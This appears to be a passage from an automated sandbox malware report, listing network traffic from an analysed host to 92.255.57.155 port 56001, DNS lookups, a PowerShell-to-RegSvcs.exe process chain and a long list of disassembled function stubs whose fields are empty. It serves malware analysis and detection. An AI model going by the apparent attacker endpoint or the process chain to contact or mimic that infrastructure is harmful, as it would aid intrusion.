Jan 14, 2025 17:17:44.643229008 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:44.763356924 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:44.766946077 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:44.771723032 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:44.772125959 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:44.777095079 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 14, 2025 17:13:47.967679024 CET | 1.1.1.1 | 192.168.2.4 | 0xc049 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 17:13:47.967679024 CET | 1.1.1.1 | 192.168.2.4 | 0xc049 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:13:34 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 11:13:34 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:13:39 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x1f0000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:13:39 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x640000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 2% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 5 |
Total number of Limit Nodes: | 0 |
Graph
Function 00007FFD9B8B0FA4 Relevance: 2.0, Instructions: 1956COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B8B1390 Relevance: .2, Instructions: 172COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06123090 Relevance: 6.5, Strings: 4, Instructions: 1497COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061230A0 Relevance: 6.5, Strings: 4, Instructions: 1495COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061253C3 Relevance: .3, Instructions: 307COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061253CC Relevance: .3, Instructions: 293COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120548 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612549B Relevance: .2, Instructions: 249COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06126450 Relevance: 5.5, Strings: 4, Instructions: 488COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027418F1 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02741900 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06126D95 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06126DED Relevance: 4.0, Strings: 3, Instructions: 266COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061202B4 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061202C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06125D58 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129B41 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129BA9 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02741EDF Relevance: 1.4, Strings: 1, Instructions: 148COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127F6F Relevance: 1.4, Strings: 1, Instructions: 130COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127F80 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06122830 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061213E8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061213D8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C372 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C3A0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129C90 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C3E7 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127B07 Relevance: .3, Instructions: 313COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612053C Relevance: .3, Instructions: 261COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061272BD Relevance: .2, Instructions: 228COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127577 Relevance: .2, Instructions: 209COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121160 Relevance: .1, Instructions: 139COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061256EF Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061256FC Relevance: .1, Instructions: 123COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127409 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121F13 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121F40 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129EB8 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612BADF Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027417F8 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127968 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06122210 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06127A38 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02741808 Relevance: .1, Instructions: 61COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129EC8 Relevance: .1, Instructions: 59COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06126AD1 Relevance: .1, Instructions: 54COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061226C8 Relevance: .1, Instructions: 51COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06126AE0 Relevance: .0, Instructions: 47COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027408F0 Relevance: .0, Instructions: 46COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00DFD7F1 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612CDA0 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612CDA2 Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120E62 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00DFD7F0 Relevance: .0, Instructions: 36COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02740988 Relevance: .0, Instructions: 31COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0274089A Relevance: .0, Instructions: 27COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02740860 Relevance: .0, Instructions: 26COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121CD3 Relevance: .0, Instructions: 25COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612BAA9 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C0D9 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612CE68 Relevance: .0, Instructions: 21COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C110 Relevance: .0, Instructions: 21COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0274151B Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027408A8 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129E89 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C670 Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612A818 Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612A8F9 Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612A6A1 Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061285A8 Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612B0D0 Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06128479 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061281A0 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120EB0 Relevance: .0, Instructions: 14COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06122FC8 Relevance: .0, Instructions: 14COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121CE0 Relevance: .0, Instructions: 14COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C0E8 Relevance: .0, Instructions: 14COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061213B1 Relevance: .0, Instructions: 13COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027418C9 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06128E08 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612A828 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612C120 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129152 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06128AC0 Relevance: .0, Instructions: 10COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121140 Relevance: .0, Instructions: 10COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02742EB7 Relevance: .0, Instructions: 9COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121700 Relevance: .0, Instructions: 9COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612BFB1 Relevance: .0, Instructions: 9COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121890 Relevance: .0, Instructions: 8COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06121A2B Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02740940 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120EF0 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120F50 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0612BFC0 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061294E0 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06120A80 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06129860 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 061287D0 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|